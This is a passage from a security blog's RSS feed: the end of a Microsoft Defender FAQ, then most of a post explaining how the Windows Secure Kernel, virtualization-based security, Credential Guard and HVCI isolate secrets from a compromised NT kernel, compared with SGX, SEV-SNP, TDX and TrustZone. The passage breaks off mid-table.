No. Consumer Windows includes Windows Security (next-gen AV, cloud protection, firewall). Enterprise customers get Defender for Endpoint Plan 1 (adds ASR rules, conditional access, Tamper Protection -- included in M365 E3) or Plan 2 (adds EDR, automated investigation, threat hunting, Security Copilot -- in M365 E5). The detection engine is the same, but enterprise tiers add investigation, response, and management capabilities.

Yes. Since 2019--2020, Microsoft Defender for Endpoint supports macOS (behavioral monitoring engine), Linux (initially auditd-based sensor, migrated to eBPF in 2023), Android, and iOS. Feature parity lags behind Windows -- the macOS and Linux sensors don&apos;t have AMSI or the same depth of OS integration -- but cross-platform support is real and improving with each release.

When a third-party AV is installed, Defender can operate in passive mode -- it monitors the system and provides scan-on-demand capability but does not perform real-time protection. If the third-party AV is removed or its subscription expires, Defender automatically re-enables. Running two real-time AV agents simultaneously causes performance degradation and detection conflicts.

Yes. Every endpoint protection product can be bypassed -- this follows from Fred Cohen&apos;s undecidability result for general virus detection. Specific Defender bypass techniques include AMSI memory patching, LOLBin abuse, fileless in-memory execution through non-AMSI-integrated paths, and adversarial ML evasion. Microsoft continuously patches known bypasses, but the arms race is inherent to the problem. Defense in depth -- using multiple security layers, not just one product -- is the practical mitigation. See the Open Problems section above for detailed analysis of each technique and current defenses. Organizations can test their detection posture against known bypass techniques using open-source tools like Atomic Red Team.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;windows-defender-evolution&quot; keyTerms={[
  { term: &quot;Signature-based detection&quot;, definition: &quot;Matching files against a database of known malware hashes and byte patterns&quot; },
  { term: &quot;AMSI&quot;, definition: &quot;Antimalware Scan Interface -- Windows API for scanning script content after deobfuscation but before execution&quot; },
  { term: &quot;Cloud-Delivered Protection&quot;, definition: &quot;Real-time ML analysis of unknown files in Microsoft&apos;s cloud, returning verdicts in milliseconds&quot; },
  { term: &quot;Block at First Sight&quot;, definition: &quot;Feature that holds unknown files from execution until the cloud verdict arrives&quot; },
  { term: &quot;EDR&quot;, definition: &quot;Endpoint Detection and Response -- post-breach detection, investigation, and response capabilities&quot; },
  { term: &quot;XDR&quot;, definition: &quot;Extended Detection and Response -- cross-domain correlation across endpoint, email, identity, and cloud&quot; },
  { term: &quot;ASR Rules&quot;, definition: &quot;Attack Surface Reduction rules that block specific dangerous behaviors proactively&quot; },
  { term: &quot;LOLBins&quot;, definition: &quot;Living-off-the-Land Binaries -- legitimate system tools repurposed by attackers for malicious purposes&quot; },
  { term: &quot;Undecidability&quot;, definition: &quot;Fred Cohen&apos;s 1986 dissertation proof that perfect virus detection is mathematically impossible (reducible to the Halting Problem)&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-defender</category><category>endpoint-protection</category><category>malware-detection</category><category>machine-learning</category><category>cybersecurity</category><category>microsoft</category><category>edr</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>When SYSTEM Isn&apos;t Enough: The Windows Secure Kernel and the End of Total Kernel Trust</title><link>https://paragmali.com/blog/the-windows-secure-kernel/</link><guid isPermaLink="true">https://paragmali.com/blog/the-windows-secure-kernel/</guid><description>How Windows built a hardware-isolated kernel above Ring 0 using Hyper-V, protecting credentials and code integrity even after full NT kernel compromise.</description><pubDate>Tue, 28 Apr 2026 00:00:00 GMT</pubDate><content:encoded>
**The Windows Secure Kernel (securekernel.exe) is a minimal kernel running in a hardware-isolated environment (VTL1) above the main NT kernel, enforced by the Hyper-V hypervisor.** It protects credentials, code integrity, and application secrets even when an attacker has full control of the standard kernel. Born from the failure of software-only defenses like PatchGuard, it represents the biggest architectural shift in Windows security since the original NT reference monitor. It is not invulnerable -- rollback attacks and side-channel vulnerabilities remain open problems -- but it fundamentally changed what &quot;kernel compromise&quot; means on Windows.
&lt;h2&gt;When SYSTEM Isn&apos;t Enough&lt;/h2&gt;
&lt;p&gt;An attacker has achieved the holy grail: SYSTEM-level access on a domain-joined Windows machine. They load Mimikatz, point it at LSASS, and reach for the domain admin&apos;s Kerberos ticket. The command runs. The output comes back empty. The credentials are there -- the machine uses them every second -- but they&apos;re locked behind a wall that even full kernel access cannot breach.&lt;/p&gt;
&lt;p&gt;Welcome to the world of the Windows Secure Kernel.&lt;/p&gt;
&lt;p&gt;For decades, Windows security rested on a single hard boundary: user mode versus kernel mode. If you crossed that line -- if you achieved Ring 0 execution -- the system was yours. Every credential, every security policy, every secret was accessible. Tools like Benjamin Delpy&apos;s Mimikatz turned this architectural reality into a practical catastrophe, making Pass-the-Hash and Pass-the-Ticket attacks trivially easy across enterprise networks [@mimikatz-github].&lt;/p&gt;
&lt;p&gt;But on a modern Windows 11 machine with Virtualization-Based Security (VBS) enabled, the rules have changed. A new trust boundary exists -- one enforced not by the kernel, but by the hypervisor running &lt;em&gt;above&lt;/em&gt; the kernel. Even SYSTEM-level access in the traditional kernel cannot reach across this boundary [@ms-vbs].&lt;/p&gt;
&lt;p&gt;If kernel mode gives you everything, what could possibly be &lt;em&gt;above&lt;/em&gt; kernel mode? The answer requires a 30-year journey through Windows security.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The All-or-Nothing Kernel: How Windows NT Was Built&lt;/h2&gt;
&lt;p&gt;In 1988, Dave Cutler began designing Windows NT with a security model influenced by military security research -- especially the reference monitor concept, distinct from Bell-LaPadula&apos;s mandatory-access-control model. State-of-the-art for its era. It also contained a fatal assumption.&lt;/p&gt;

The core component of the Windows NT security architecture that mediates all access to securable objects (files, registry keys, processes) by checking Access Control Lists (ACLs) against the caller&apos;s security token. The SRM runs in kernel mode and enforces discretionary access control for every system operation.
&lt;p&gt;The NT kernel drew a hard line between Ring 3 (user mode) and Ring 0 (kernel mode) [@custer-inside-nt]. User-mode processes could not directly access kernel memory. The Security Reference Monitor mediated all access to system objects. For the early 1990s, this was a significant advance over DOS and Windows 9x, where applications and the OS shared the same memory space with no isolation at all.Dave Cutler previously designed VMS at Digital Equipment Corporation (DEC). Many NT design principles -- including the SRM, the object manager, and the layered architecture -- trace directly back to VMS. The letters &quot;WNT&quot; are famously one character ahead of &quot;VMS&quot; in the alphabet.&lt;/p&gt;
&lt;p&gt;But the NT model contained a fatal assumption: &lt;strong&gt;all kernel-mode code is equally trusted&lt;/strong&gt;. Once a driver or exploit gained Ring 0 access, it shared the same address space and privilege level as the kernel itself. It could read and write any memory, modify the System Service Dispatch Table (SSDT), manipulate the Interrupt Descriptor Table (IDT), or unlink processes from the EPROCESS active process list.&lt;/p&gt;
&lt;p&gt;This was the golden age of kernel-mode rootkits. Jamie Butler&apos;s FU rootkit (2004) used Direct Kernel Object Manipulation (DKOM) to unlink processes from the active process list, making malicious processes invisible to Task Manager, antivirus tools, and every other system utility [@hoglund-rootkits]. SSDT hooking allowed rootkits to intercept and redirect any system call, providing total control over OS behavior.&lt;/p&gt;
&lt;p&gt;Mark Russinovich and Bryce Cogswell built the Sysinternals tools to make these kernel internals visible to defenders [@sysinternals-story]. Process Explorer, Filemon, and Regmon became essential diagnostic instruments. But visibility is not protection. Defenders could see the problem; they could not stop it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The NT kernel drew one hard line -- user mode versus kernel mode. When attackers crossed that line, there was nothing left to protect. Every security mechanism, every credential, every policy lived in the same flat address space. Microsoft needed to draw a new line.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr /&gt;
&lt;h2&gt;Software Guards for a Hardware Problem: PatchGuard and Friends&lt;/h2&gt;
&lt;p&gt;What do you do when the prisoners are as powerful as the guards? You send in more guards at the same level. That was Microsoft&apos;s first strategy -- and its fundamental flaw.&lt;/p&gt;

A software-only kernel integrity monitor introduced in 2005 for 64-bit Windows. PatchGuard periodically checks critical kernel structures (SSDT, IDT, GDT, processor MSRs) for unauthorized modifications and forces a Blue Screen of Death (CRITICAL_STRUCTURE_CORRUPTION) if tampering is detected.
&lt;p&gt;PatchGuard arrived in Windows XP x64 and Windows Server 2003 SP1 in 2005 [@wp-patchguard]. It used obfuscated, randomized integrity checks to detect unauthorized modifications to kernel structures. If it caught tampering, it triggered a BSOD. On the surface, this seemed like a strong defense.PatchGuard&apos;s internal implementation uses extensive obfuscation: randomized check intervals, encrypted context blocks, and self-protecting code that resists static analysis. Microsoft never published its internal design, treating security through obscurity as a deliberate delaying tactic against attackers.&lt;/p&gt;
&lt;p&gt;Mandatory kernel-mode code signing followed with Windows Vista x64 in 2007, requiring all kernel drivers to carry a valid &lt;a href=&quot;https://paragmali.com/blog/windows-app-identity-33-year-reinvention/&quot; rel=&quot;noopener&quot;&gt;Authenticode&lt;/a&gt; signature [@ms-kmcs]. Data Execution Prevention (DEP) marked memory pages as non-executable [@ms-dep]. Address Space Layout Randomization (ASLR) randomized the memory layout of loaded modules [@ms-mitigations]. Supervisor Mode Execution Prevention (SMEP) blocked kernel code from executing user-mode memory pages [@ms-mitigations].&lt;/p&gt;
&lt;p&gt;Each mitigation raised the cost of attack. Together, they made kernel exploitation significantly harder. But each one had a fatal weakness.&lt;/p&gt;

An attack technique where adversaries install a legitimately signed but vulnerable third-party driver, then exploit the driver&apos;s vulnerability to gain arbitrary kernel-mode code execution. Because the driver carries a valid signature, it bypasses kernel-mode code signing enforcement.
&lt;p&gt;&lt;strong&gt;PatchGuard runs at Ring 0 -- the same privilege level as the attackers it monitors.&lt;/strong&gt; In 2019, the InfinityHook project demonstrated how to hook kernel callbacks via the Event Tracing for Windows (ETW) subsystem without patching any kernel structures that PatchGuard checks [@infinityhook-github]. PatchGuard never noticed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kernel-mode code signing stops unsigned drivers but not signed-and-vulnerable ones.&lt;/strong&gt; The BYOVD technique became a staple of advanced persistent threat (APT) groups: install a legitimately signed driver with a known vulnerability, exploit that vulnerability, and gain arbitrary kernel execution while all code signing checks pass [@ms-vuln-drivers].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;DEP is bypassed by Return-Oriented Programming (ROP).&lt;/strong&gt; Instead of injecting new code, attackers chain existing executable code snippets (&quot;gadgets&quot;) to achieve arbitrary computation [@wp-rop]. &lt;strong&gt;ASLR has limited entropy&lt;/strong&gt; on 32-bit systems and is defeated by information leaks that reveal randomized base addresses [@wp-aslr].&lt;/p&gt;

Benjamin Delpy released Mimikatz in 2011, and the security world was never the same. What began as a proof-of-concept for extracting plaintext passwords from LSASS memory became the single most-used credential theft tool in real-world attacks. Red teams used it. Nation-state actors used it. Ransomware gangs used it. The tool&apos;s existence -- more than any theoretical argument -- forced Microsoft to confront the fact that LSASS credentials in a flat kernel address space were indefensible. Credential Guard was Mimikatz&apos;s direct response [@mimikatz-github].

PatchGuard was a guard who could be knocked out by the very prisoners it watched. A defense sharing its privilege level with the attacker can always, given sufficient motivation, be subverted.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; No software-only defense can protect against an attacker at the same privilege level. This is not a fixable bug -- it is a structural limitation. PatchGuard delays attacks; it cannot prevent them. Microsoft needed something that kernel-mode code could not even reach.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr /&gt;
&lt;h2&gt;Building the Foundation: Secure Boot and the Trust Chain&lt;/h2&gt;
&lt;p&gt;If you cannot trust the kernel at runtime, can you at least trust that it started clean? UEFI Secure Boot bet on that premise.&lt;/p&gt;
&lt;p&gt;Windows 8 (October 2012) mandated Secure Boot for certified hardware, establishing a cryptographic chain of trust from firmware through bootloader to OS kernel [@ms-secure-boot]. Only components signed by trusted authorities could execute during the boot process. Measured Boot extended this by hashing each boot component into TPM Platform Configuration Registers (PCRs), creating a verifiable boot log that remote attestation services could check [@ms-trusted-boot].&lt;/p&gt;
&lt;p&gt;This was a real advance. Bootkits like TDL4/Alureon, which operated below the OS and were invisible to all software-based defenses, were effectively blocked [@ms-alureon]. The boot chain was now cryptographically verified.&lt;/p&gt;
&lt;p&gt;But Secure Boot had a critical gap: it protected the boot process, not runtime. Once Windows loaded and started executing, a kernel exploit could compromise the system just as before. PatchGuard was still the only runtime defense, and we have already seen its limitations.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; In 2023, ESET researchers confirmed BlackLotus -- the first publicly known UEFI bootkit that bypassed Secure Boot on fully updated Windows systems. It exploited CVE-2022-21894, using a legitimately signed but vulnerable Windows boot manager to load malicious code before the OS [@blacklotus-eset]. The attack demonstrated that even boot-time trust chains can be undermined via BYOVD-style techniques applied to the boot stack itself.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Secure Boot ensured the system started clean but could not keep it clean. Microsoft needed runtime isolation -- and the key technology was already sitting on millions of machines, unused for this purpose: the hypervisor.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Breakthrough: Virtual Trust Levels and the Secure Kernel&lt;/h2&gt;
&lt;p&gt;The insight that changed everything was deceptively simple: if Ring 0 attackers can compromise anything at Ring 0, create a Ring -1. The hypervisor was already there.&lt;/p&gt;
&lt;p&gt;Intel VT-x and AMD-V hardware virtualization extensions, shipping since 2005-2006, gave the hypervisor a privilege level above the OS kernel [@x86-virtualization]. Microsoft&apos;s Hyper-V already used this capability for virtual machines. The breakthrough was recognizing that the same hardware could create a security boundary &lt;em&gt;within a single OS instance&lt;/em&gt; -- not a separate VM, but a hardware-isolated execution context that the kernel could not reach.&lt;/p&gt;

A hardware-enforced execution environment created by the Hyper-V hypervisor using Second Level Address Translation (SLAT). VTL0 is the Normal World where the standard NT kernel, drivers, and applications run. VTL1 is the Secure World where securekernel.exe and security-critical trustlets execute. VTL1 memory is physically inaccessible to all VTL0 code, including the NT kernel.

A hardware feature (Intel Extended Page Tables / AMD Nested Page Tables) that provides a second layer of virtual-to-physical address translation managed by the hypervisor. SLAT enables the hypervisor to control which physical memory pages each VTL can access, making VTL1 memory invisible to VTL0 without any software-level enforcement that could be bypassed.
&lt;p&gt;In May 2015, Brad Anderson announced Virtualization-Based Security, Device Guard, and Credential Guard at Microsoft Ignite [@anderson-ignite-2015]. The initial Windows 10 release, version 1507 (July 2015), shipped with VBS, creating two Virtual Trust Levels: VTL0 (Normal World) and VTL1 (Secure World) [@ms-vbs].&lt;/p&gt;

flowchart TB
    subgraph VTL1[&quot;VTL1 -- Secure World&quot;]
        SK[&quot;securekernel.exe\n(Secure Kernel)&quot;]
        IUM[&quot;Isolated User Mode&quot;]
        LSAISO[&quot;lsaiso.exe\n(Credential Guard)&quot;]
        ENCLAVE[&quot;VBS Enclaves&quot;]
        IUM --- LSAISO
        IUM --- ENCLAVE
    end
    subgraph VTL0[&quot;VTL0 -- Normal World&quot;]
        NT[&quot;ntoskrnl.exe\n(NT Kernel)&quot;]
        DRIVERS[&quot;Kernel Drivers&quot;]
        LSASS[&quot;lsass.exe\n(LSASS broker)&quot;]
        APPS[&quot;User Applications&quot;]
    end
    subgraph HV[&quot;Hyper-V Hypervisor&quot;]
        SLAT[&quot;SLAT Enforcement\n(Intel EPT / AMD NPT)&quot;]
    end
    HV --&amp;gt;|&quot;enforces memory isolation&quot;| VTL1
    HV --&amp;gt;|&quot;enforces memory isolation&quot;| VTL0
    VTL0 -.-&amp;gt;|&quot;Secure Service Calls\n(controlled boundary)&quot;| VTL1
&lt;p&gt;Here is how it works:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;At boot, the Hyper-V hypervisor initializes and creates both VTLs.&lt;/li&gt;
&lt;li&gt;The standard NT kernel (ntoskrnl.exe), all drivers, and user-mode applications run in VTL0.&lt;/li&gt;
&lt;li&gt;securekernel.exe loads in VTL1 kernel mode. It is a minimal, purpose-built kernel that handles only security-critical functions [@ionescu-bh2015].&lt;/li&gt;
&lt;li&gt;The hypervisor uses SLAT to make VTL1 memory physically inaccessible to VTL0. No amount of Ring 0 code in VTL0 can read or write VTL1 pages.&lt;/li&gt;
&lt;li&gt;Communication between VTL0 and VTL1 occurs only via Secure Service Calls (SSCs) -- controlled hypercalls that cross the VTL boundary under strict validation [@ms-vbs].&lt;/li&gt;
&lt;/ol&gt;

A process running in VTL1 Isolated User Mode (IUM), protected from all VTL0 access by hypervisor-enforced memory isolation. The canonical example is lsaiso.exe, the Credential Guard trustlet that holds NTLM hashes and Kerberos tickets in VTL1 where even a fully compromised NT kernel cannot reach them.
&lt;p&gt;securekernel.exe is deliberately minimal. While ntoskrnl.exe is a large general-purpose kernel, securekernel.exe is a much smaller, purpose-built VTL1 kernel whose exact size varies by Windows build. A smaller codebase means a smaller attack surface -- every line of code in VTL1 is a potential entry point for attackers, so Microsoft keeps it as small as possible.&lt;/p&gt;
&lt;p&gt;Alex Ionescu&apos;s 2015 Black Hat presentation was the first major public technical teardown of the Secure Kernel Mode (SKM) and Isolated User Mode (IUM) architecture [@ionescu-bh2015]. Rafal Wojtczuk (Bromium) followed in 2016 with the first independent security audit of VBS, mapping the trust boundaries and identifying the secure call interface as the primary attack surface [@wojtczuk-bh2016].&lt;/p&gt;
&lt;p&gt;What can an attacker with full SYSTEM access in VTL0 &lt;em&gt;not&lt;/em&gt; do?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Read credentials protected by Credential Guard&lt;/li&gt;
&lt;li&gt;Load unsigned kernel drivers when HVCI is enabled&lt;/li&gt;
&lt;li&gt;Access VTL1 memory or modify Secure Kernel data structures&lt;/li&gt;
&lt;li&gt;Disable VBS without rebooting (and with Secure Boot + UEFI lock, not easily even then)&lt;/li&gt;
&lt;/ul&gt;

For the first time, an attacker with full NT kernel compromise could not access secrets protected in VTL1. This fundamentally changed the Windows threat model.
&lt;p&gt;For the first time, full NT kernel compromise was no longer game over. But what, exactly, does this new architecture protect?&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;The Pillars: What the Secure Kernel Protects&lt;/h2&gt;
&lt;p&gt;The Secure Kernel is not a product -- it is a platform. Five distinct security features stand on its shoulders, each protecting a different class of asset.&lt;/p&gt;
&lt;h3&gt;Credential Guard&lt;/h3&gt;
&lt;p&gt;When Credential Guard is enabled, NTLM password hashes and Kerberos Ticket-Granting Tickets (TGTs) are stored exclusively in lsaiso.exe -- a trustlet running in VTL1 [@ms-credential-guard]. The VTL0 lsass.exe process acts as a broker: authentication requests from VTL0 are forwarded to lsaiso.exe via secure RPC over the VTL boundary. lsaiso.exe performs cryptographic operations (challenge signing, ticket generation) within VTL1 and returns only the result -- never the raw secret.&lt;/p&gt;

sequenceDiagram
    participant App as Application (VTL0)
    participant LSASS as lsass.exe (VTL0)
    participant HV as Hypervisor
    participant LSAISO as lsaiso.exe (VTL1)
    App-&amp;gt;&amp;gt;LSASS: Authentication request
    LSASS-&amp;gt;&amp;gt;HV: Secure Service Call
    HV-&amp;gt;&amp;gt;LSAISO: Forward to VTL1
    LSAISO-&amp;gt;&amp;gt;LSAISO: Sign challenge with stored credential
    LSAISO-&amp;gt;&amp;gt;HV: Return signed response (NOT the raw secret)
    HV-&amp;gt;&amp;gt;LSASS: Forward to VTL0
    LSASS-&amp;gt;&amp;gt;App: Authentication result
    Note over LSASS: Even SYSTEM access here cannot read VTL1 memory
&lt;p&gt;Even a Mimikatz-wielding attacker with SYSTEM access in VTL0 gets nothing -- the raw credentials never exist in VTL0 memory. Credential Guard is enabled by default on domain-joined, non-DC Windows 11 22H2+ systems that meet VBS hardware requirements [@ms-credential-guard].&lt;/p&gt;
&lt;h3&gt;HVCI / Memory Integrity&lt;/h3&gt;

A VBS feature (also called &quot;Memory Integrity&quot;) that enforces kernel-mode code integrity from VTL1. HVCI ensures only signed code executes in the kernel and enforces W^X (Write XOR Execute) policy on all kernel memory pages via SLAT. No kernel memory page can be both writable and executable simultaneously.

A memory protection policy enforcing that a page can be either writable or executable, but never both simultaneously. HVCI enforces W^X across all kernel memory via SLAT page permissions controlled from VTL1, preventing attackers from injecting and executing arbitrary code in the kernel.
&lt;p&gt;HVCI moves code integrity enforcement from VTL0 into VTL1 [@ms-hvci]. Before any kernel-mode driver loads, its signature is verified by VTL1 code integrity services. HVCI enforces W^X on kernel memory pages using SLAT: page table modifications that would create a writable-and-executable page are trapped by the hypervisor and denied. Even if an attacker achieves kernel execution in VTL0, they cannot load unsigned drivers or make arbitrary kernel memory executable.On newer CPUs, Intel Mode-Based Execution Control (MBEC, Kaby Lake / 7th Gen+) and AMD Guest Mode Execute Trap (GMET, Zen 2+) provide hardware-accelerated W^X enforcement. Older CPUs rely on software emulation (&quot;Restricted User Mode&quot;), which increases overhead.&lt;/p&gt;

flowchart TD
    A[&quot;Driver load request\n(VTL0)&quot;] --&amp;gt; B[&quot;Signature check\n(VTL1 code integrity)&quot;]
    B --&amp;gt;|&quot;Valid signature&quot;| C[&quot;Set page permissions:\nExecutable + Read-Only&quot;]
    B --&amp;gt;|&quot;Invalid signature&quot;| D[&quot;BLOCKED\nDriver cannot load&quot;]
    E[&quot;Attacker tries to\nmake page W+X&quot;] --&amp;gt; F{&quot;SLAT check\n(Hypervisor)&quot;}
    F --&amp;gt;|&quot;Violation: W+X&quot;| G[&quot;DENIED\nPage remains Read-Only&quot;]
    F --&amp;gt;|&quot;Valid: W XOR X&quot;| H[&quot;Allowed&quot;]
&lt;h3&gt;VBS Enclaves&lt;/h3&gt;

An isolated memory region backed by VTL1 that allows third-party applications to protect secrets from even admin-level OS compromise. The host application in VTL0 communicates with the enclave via the CallEnclave API. Enclave memory is invisible to all VTL0 code, including the NT kernel. Available since Windows 11 24H2.
&lt;p&gt;Starting with Windows 11 24H2, third-party developers can create their own VTL1-protected enclaves -- isolated memory regions for protecting application-level secrets like encryption keys and authentication tokens [@pulapaka-vbs-enclaves]. Unlike Intel SGX, VBS Enclaves require no specialized hardware beyond a VBS-capable CPU [@ms-vbs-enclaves]. Developers define enclave interfaces using EDL (Enclave Description Language) files and build with the VBS Enclave Tooling SDK [@vbs-enclave-tooling].&lt;/p&gt;

The development model works like this: you create an enclave DLL, sign it with a Trusted Signing certificate, and load it via the host application. The enclave runs in VTL1 user mode with access to a limited API surface -- no general Windows API access. All inputs from the VTL0 host must be validated and copied into VTL1 before use. Microsoft&apos;s developer guide covers the details [@ms-vbs-enclaves-dev], and the VBS Enclave Tooling package provides Rust crate support and Visual Studio 2022+ integration [@vbs-enclave-tooling].
&lt;h3&gt;System Guard Runtime Attestation&lt;/h3&gt;
&lt;p&gt;System Guard extends the trust chain from boot into runtime [@ms-system-guard]. A trustlet running in VTL1 periodically measures the integrity of critical system components -- boot state, kernel integrity, driver signatures -- and signs these measurements using a hardware-backed TPM key. Because the measurement code runs in VTL1, it is protected from tampering by compromised VTL0 code [@ms-system-guard-hw]. Remote attestation services (such as &lt;a href=&quot;https://paragmali.com/blog/the-defenders-dilemma-microsoft-antivirus/&quot; rel=&quot;noopener&quot;&gt;Microsoft Defender for Endpoint&lt;/a&gt;) can verify these signed reports to confirm device health -- enabling zero-trust conditional access decisions.&lt;/p&gt;
&lt;h3&gt;Secured-core PCs&lt;/h3&gt;
&lt;p&gt;Secured-core PCs integrate hardware, firmware, and VBS into a single security platform requirement [@ms-secured-core]. Certified hardware must include a 64-bit CPU with SLAT, IOMMU for DMA protection, &lt;a href=&quot;https://paragmali.com/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/&quot; rel=&quot;noopener&quot;&gt;TPM 2.0&lt;/a&gt;, UEFI with Secure Boot, SMM protection, DRTM support, and VBS/HVCI enabled and firmware-locked. Major OEMs -- Dell, HP, Lenovo, Microsoft Surface -- ship Secured-core PCs for enterprise and government customers.&lt;/p&gt;
&lt;p&gt;VBS also enables additional isolation features beyond these core pillars. Windows Defender Application Guard (WDAG) uses Hyper-V containers to isolate untrusted browser sessions and Office documents, preventing web-based exploits from reaching the host OS. Hyper-V container isolation provides similar protection for containerized workloads.&lt;/p&gt;
&lt;h3&gt;Decision Guide&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Recommended Approach&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Protect domain credentials from Pass-the-Hash/Ticket&lt;/td&gt;
&lt;td&gt;Enable Credential Guard&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prevent unsigned kernel driver loading&lt;/td&gt;
&lt;td&gt;Enable HVCI / Memory Integrity&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Protect application-level secrets from admin attacks&lt;/td&gt;
&lt;td&gt;Develop a VBS Enclave&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Verify device integrity for zero-trust&lt;/td&gt;
&lt;td&gt;Enable System Guard Runtime Attestation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Maximum baseline security for new hardware&lt;/td&gt;
&lt;td&gt;Require Secured-core PC certification&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The Secure Kernel now protects credentials, code integrity, application secrets, and device health. It is deployed across many millions of Windows 11 and Windows Server machines via VBS-by-default. But is it unbreakable?&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;How Others Solve This Problem: Competing Approaches&lt;/h2&gt;
&lt;p&gt;Windows is not alone in this challenge. Intel, AMD, and ARM each built their own answer to the same question: how do you protect secrets from a compromised OS? Each made different trade-offs.&lt;/p&gt;
&lt;h3&gt;Intel SGX&lt;/h3&gt;
&lt;p&gt;Intel Software Guard Extensions provided hardware enclaves at the CPU level without requiring a hypervisor [@wp-sgx]. Application code and data inside an SGX enclave were encrypted in memory and isolated from the OS, hypervisor, and other applications. The idea was compelling: trust nothing but the CPU itself.&lt;/p&gt;
&lt;p&gt;Then side-channel attacks proved the CPU itself was not trustworthy. The Foreshadow attack (2018) exploited L1 Terminal Fault to extract data directly from SGX enclaves via CPU cache side channels [@foreshadow]. Intel deprecated SGX across 11th Gen client CPUs, including Tiger Lake mobile and Rocket Lake desktop, and continued that direction with 12th Gen Alder Lake [@wp-sgx].&lt;/p&gt;
&lt;h3&gt;AMD SEV-SNP&lt;/h3&gt;
&lt;p&gt;AMD Secure Encrypted Virtualization with Secure Nested Paging (SEV-SNP) encrypts VM memory with per-VM keys and enforces page ownership via a Reverse Map Table (RMP) -- a hardware table that records which VM owns each physical page [@amd-sev]. Even the hypervisor cannot read or remap guest memory without the guest&apos;s consent. This is a fundamentally different trust model from VBS: SEV-SNP &lt;em&gt;distrusts&lt;/em&gt; the hypervisor, while VBS &lt;em&gt;trusts&lt;/em&gt; it. SEV-SNP protects VMs in multi-tenant cloud environments (like Azure Confidential VMs) but does not provide intra-OS isolation within a single machine the way VBS does. The two are complementary, not competing.&lt;/p&gt;
&lt;h3&gt;Intel TDX&lt;/h3&gt;
&lt;p&gt;Intel Trust Domain Extensions create hardware-isolated Trust Domains for VMs, excluding the hypervisor from the trusted computing base [@intel-tdx]. The TDX Module runs in a special CPU mode called Secure Arbitration Mode (SEAM) and mediates all interactions between the hypervisor and Trust Domains -- the hypervisor can schedule TD VMs but cannot read their memory or registers. Like SEV-SNP, TDX targets cloud confidential computing rather than intra-OS protection. It complements VBS rather than replacing it.&lt;/p&gt;
&lt;h3&gt;ARM TrustZone&lt;/h3&gt;
&lt;p&gt;ARM TrustZone partitions the CPU into a Secure World and a Normal World using a hardware security state bit, predating VBS by a decade (2004 vs. 2015) [@arm-trustzone]. World transitions happen through a Secure Monitor Call (SMC) instruction, handled by firmware or a trusted OS like OP-TEE. The concept is similar to VBS -- two execution worlds with hardware isolation -- but the mechanism differs. TrustZone has a smaller attack surface (no hypervisor in the path) but is less flexible: it typically supports only two worlds with coarser granularity. TrustZone dominates mobile and embedded devices; Windows on ARM still uses the hypervisor-based VBS model for VTL0/VTL1 separation, the same architecture as VBS on x64.ARM TrustZone predates VBS by over a decade. The concept of hardware-enforced dual execution worlds was well established in the mobile/embedded world long before Microsoft applied the idea to desktop Windows. The insight was not the dual-world concept itself, but using the x86 hypervisor to implement it.&lt;/p&gt;
&lt;h3&gt;Linux&lt;/h3&gt;
&lt;p&gt;No production equivalent of VBS exists in mainline Linux. Linux relies on Mandatory Access Control (SELinux/AppArmor), container isolation (namespaces/cgroups), and VM-level isolation via SEV-SNP or TDX for cloud workloads. Google&apos;s pKVM (Protected KVM) in Android and ChromeOS is the closest parallel -- it uses the hypervisor to isolate a secure VM from the host kernel, similar in spirit to VTL1. Research projects have proposed similar intra-OS isolation for desktop Linux, but none has reached mainline. Linux&apos;s security philosophy favors defense-in-depth via many smaller mechanisms rather than a single architectural boundary.&lt;/p&gt;
&lt;h3&gt;Cross-Platform Comparison&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Windows VBS&lt;/th&gt;
&lt;th&gt;Intel SGX&lt;/th&gt;
&lt;th&gt;AMD SEV-SNP&lt;/th&gt;
&lt;th&gt;Intel TDX&lt;/th&gt;
&lt;th&gt;ARM TrustZone&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Isolation granularity&lt;/td&gt;
&lt;td&gt;OS-level (VTL split)&lt;/td&gt;
&lt;td&gt;Process-level enclaves&lt;/td&gt;
&lt;td&gt;VM-level&lt;/td&gt;
&lt;td&gt;VM-level&lt;/td&gt;
&lt;td&gt;2 worlds&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Trusts the hypervisor?&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;N/A (no hypervisor)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
